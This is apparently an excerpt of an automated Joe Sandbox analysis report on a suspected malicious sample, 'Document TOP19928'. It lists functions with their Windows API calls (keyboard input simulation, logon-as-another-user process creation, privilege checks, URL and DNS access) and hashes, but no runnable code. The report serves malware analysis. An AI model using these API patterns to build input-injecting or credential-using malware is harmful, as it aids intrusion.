Instruction ID: 57eddadfb84ad41ffff3568a10202a119c15e5e676904b2768bee16770795faf
Opcode Fuzzy Hash: 99f04bb447f87a5c3ae063b9ed4e75752911588607176d9802782aaa30498a8c
Instruction Fuzzy Hash: 6441F839200610DFCB10AF15C598A59BBF5FF89310F099499FA4A9B362CB38FD01CB91

Function 00858AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00858B4D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 7228e989d73040dec87bee8b2fb7a0aa7794fb9b22a07ef6204e1b04f5fd99d8
Instruction ID: 033dbc920921435f818c480c68889bda529762e8f41f1ae7e6ec90f2e066df62
Opcode Fuzzy Hash: 7228e989d73040dec87bee8b2fb7a0aa7794fb9b22a07ef6204e1b04f5fd99d8
Instruction Fuzzy Hash: 9031C374600218FFEF209A18CC45FA937A9FB05363F244613FE51F62A1DE30A9588A43

Function 0085ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0085AE1A
GetWindowRect.USER32(?,?), ref: 0085AE90
PtInRect.USER32(?,?,0085C304), ref: 0085AEA0
MessageBeep.USER32(00000000), ref: 0085AF11

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e37251d539136e9255c9acf371918b2085e6913c3e05c19df8f15bab0a1e9670
Instruction ID: 568fc87d5ea32f2ef8ee2048b15455c031d0e49fd27d30b9df39e01579140df8
Opcode Fuzzy Hash: e37251d539136e9255c9acf371918b2085e6913c3e05c19df8f15bab0a1e9670
Instruction Fuzzy Hash: 0541BE70600209DFCB19DF58D8C5B69BBF5FF49342F1882A9E815EB251D730A909CF92

Function 00830FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00831037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00831053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008310B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0083110B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
Instruction ID: b7451e8beea67246911542fca52ca0904044248081a1b11415940c975d659cbe
Opcode Fuzzy Hash: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
Instruction Fuzzy Hash: B9311830A40A88AAEF388A698C1D7F9BBA9FBC4B10F04421AE580D61D1C77489D097D1

Function 00831121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00831176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00831192
PostMessageW.USER32(00000000,00000101,00000000), ref: 008311F1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00831243

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
Instruction ID: 7c8861175e1ce9650f7f299c7e9ef04c2adbf5daa46d74060e5aee95af20a636
Opcode Fuzzy Hash: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
Instruction Fuzzy Hash: 51310730A4070C5AEF20CA69881D7FEBBAAFBC9710F04535BE680D21D1C378495597E5

Function 00806415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0080644B
__isleadbyte_l.LIBCMT ref: 00806479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008064A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008064DD

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a57be696efdaa925c96110ff90cc0ef73f6f274bde486d70c070dcd0fd3912ee
Instruction ID: b3d0fa7766651556520b06bae235bd055fb04ffb78658e61d8af87101118c9a2
Opcode Fuzzy Hash: a57be696efdaa925c96110ff90cc0ef73f6f274bde486d70c070dcd0fd3912ee
Instruction Fuzzy Hash: 5831BE31600A5AEFDB618F65CC85BBA7BA5FF41320F154029E864C71E1EB35D8B0DB94

Function 00855175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00855189

Part of subcall function 0083387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00833897
Part of subcall function 0083387D: GetCurrentThreadId.KERNEL32 ref: 0083389E
Part of subcall function 0083387D: AttachThreadInput.USER32(00000000,?,008352A7), ref: 008338A5

GetCaretPos.USER32(?), ref: 0085519A
ClientToScreen.USER32(00000000,?), ref: 008551D5
GetForegroundWindow.USER32 ref: 008551DB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 175393fca1efd28e3c6288f37860fa5a64dadc205b958f615ed4f5c536091e36
Instruction ID: 5aa66aa33c459ec1b415e6db5daed9f4c44a4981da4b4c66bea1270947f7842e
Opcode Fuzzy Hash: 175393fca1efd28e3c6288f37860fa5a64dadc205b958f615ed4f5c536091e36
Instruction Fuzzy Hash: 0E311072900118AFDB00EFA5C885AEFB7FDFF98304F10806AE515E7241EA759E45CBA1

Function 00828B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00828652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828669
Part of subcall function 00828652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00828673
Part of subcall function 00828652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00828682
Part of subcall function 00828652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00828689
Part of subcall function 00828652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0082869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00828BEB
_memcmp.LIBCMT ref: 00828C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00828C44
HeapFree.KERNEL32(00000000), ref: 00828C4B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 2182266621-0
Opcode ID: b3e08d0ac7b547867a551fbd76511ba407e418c8827f018c7b28fdc19d47f991
Instruction ID: 5ba19b835cccd2f40f2d939c68565584ac0ae36b8e642312771708bb1156e8ac
Opcode Fuzzy Hash: b3e08d0ac7b547867a551fbd76511ba407e418c8827f018c7b28fdc19d47f991
Instruction Fuzzy Hash: 94218971E42218EBDF00DFA4D948BAEB7B8FF40355F144099E554E7241DB34AA86DB60

Function 007F0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 007F0BF2

Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837B20,?,?,00000000), ref: 007D5B8C
Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837B20,?,?,00000000,?,?), ref: 007D5BB0

_fprintf.LIBCMT ref: 007F0C29
OutputDebugStringW.KERNEL32(?), ref: 00826331

Part of subcall function 007F4CDA: _flsall.LIBCMT ref: 007F4CF3

__setmode.LIBCMT ref: 007F0C5E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 58694fcf4698019589602698d87aff30af7aa69f1bb2079553807cdfa29f495e
Instruction ID: b08ecf5553a838d0d47f67fa24f6bd7c4f22cc0beca256512713f668bdb76ae5
Opcode Fuzzy Hash: 58694fcf4698019589602698d87aff30af7aa69f1bb2079553807cdfa29f495e
Instruction Fuzzy Hash: BF110532904208FBCB04B3B4AC4A9BE7B79EF81320F14011AF30497392EE681D9193E1

Function 00841A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00841A97

Part of subcall function 00841B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00841B40
Part of subcall function 00841B21: InternetCloseHandle.WININET(00000000), ref: 00841BDD

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
Instruction ID: 53c7258d13f8b813715e19005d4427bf9bd2b450acd5c68baa05b40032a08fe9
Opcode Fuzzy Hash: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
Instruction Fuzzy Hash: F621DE31200708BFEB129F60CC09FBABBADFF88711F10001AFA51D6651EB31E8509BA0

Function 0082E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0082E1C4,?,?,?,0082EFB7,00000000,000000EF,00000119,?,?), ref: 0082F5BC
Part of subcall function 0082F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0082F5E2
Part of subcall function 0082F5AD: lstrcmpiW.KERNEL32(00000000,?,0082E1C4,?,?,?,0082EFB7,00000000,000000EF,00000119,?,?), ref: 0082F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0082EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0082E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 0082E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0082EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0082E237

Strings

cdecl, xrefs: 0082E22E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 01e1038f5161ee0e348c838f2592b52e24f59373a69d24bf339365f2495acc38
Instruction ID: 3830cefa0b394bbe34150c734e7af1cf665a64194a787979c78bc7e9c5c45801
Opcode Fuzzy Hash: 01e1038f5161ee0e348c838f2592b52e24f59373a69d24bf339365f2495acc38
Instruction Fuzzy Hash: 6111D036200315EFCB25AF74EC49D7A77B8FF84350B40402AF916CB2A1EB719890C7A4

Function 00805332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00805351

Part of subcall function 007F594C: __FF_MSGBANNER.LIBCMT ref: 007F5963
Part of subcall function 007F594C: __NMSG_WRITE.LIBCMT ref: 007F596A
Part of subcall function 007F594C: RtlAllocateHeap.NTDLL(00EF0000,00000000,00000001), ref: 007F598F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: a1540eb94747f4654d992faa2253dde2201efea244f3be67e139971b56e78c96
Instruction ID: 7f561ab401549b32285682df7ff821215a27b59763952a0cf38300195d282825
Opcode Fuzzy Hash: a1540eb94747f4654d992faa2253dde2201efea244f3be67e139971b56e78c96
Instruction Fuzzy Hash: 26110432604A09EEDB602F70AC0866F3798FF063A0F11442AFA04D63D1DA7989408B61

Function 007D4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D4560

Part of subcall function 007D410D: _memset.LIBCMT ref: 007D418D
Part of subcall function 007D410D: _wcscpy.LIBCMT ref: 007D41E1
Part of subcall function 007D410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D41F1

KillTimer.USER32(?,00000001,?,?), ref: 007D45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0080D6CE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 607fb78b8f3f94bef29cb643b4eda039bf222f23292d6a2d77ba333ca9272f41
Instruction ID: ee70eb401502e99e7a0ca07350fb4408409f9b287a462a1f8b26ad2538951c07
Opcode Fuzzy Hash: 607fb78b8f3f94bef29cb643b4eda039bf222f23292d6a2d77ba333ca9272f41
Instruction Fuzzy Hash: 0C21FC709047889FEB729B64DC45BE7BFECEF11308F04009EE69E96281C7795A84CB91

Function 00828AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00828B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00828B31
CloseHandle.KERNEL32(00000004), ref: 00828B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00828B7A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
Instruction ID: f6acdd6605921684ad55bc9d4e688e9e5fc5b6a0d16fa76d8cea45536cee3e72
Opcode Fuzzy Hash: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
Instruction Fuzzy Hash: 2B1159B250124DEBDF018FA4ED49FDA7BA9FF08316F044068FE04A2161C7768DA0AB60

Function 0084667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837B20,?,?,00000000), ref: 007D5B8C
Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837B20,?,?,00000000,?,?), ref: 007D5BB0

gethostbyname.WS2_32(?), ref: 008466AC
WSAGetLastError.WS2_32(00000000), ref: 008466B7
_memmove.LIBCMT ref: 008466E4
inet_ntoa.WS2_32(?), ref: 008466EF

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 196b83993c8e10aa7a6f8c7197e441d8fae17321a7efd4ce13f7150c587eb4fb
Instruction ID: 1d344f61b6f7026b29e7420f6050ff099a74ce412cfc61148188570f6a80450d
Opcode Fuzzy Hash: 196b83993c8e10aa7a6f8c7197e441d8fae17321a7efd4ce13f7150c587eb4fb
Instruction Fuzzy Hash: A9114C75500609EBCB00EBA4D98ADEEB7B8FF44311B144166F606A7262EF34AE14CB61

Function 00829023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00829043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00829055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0082906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00829086

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
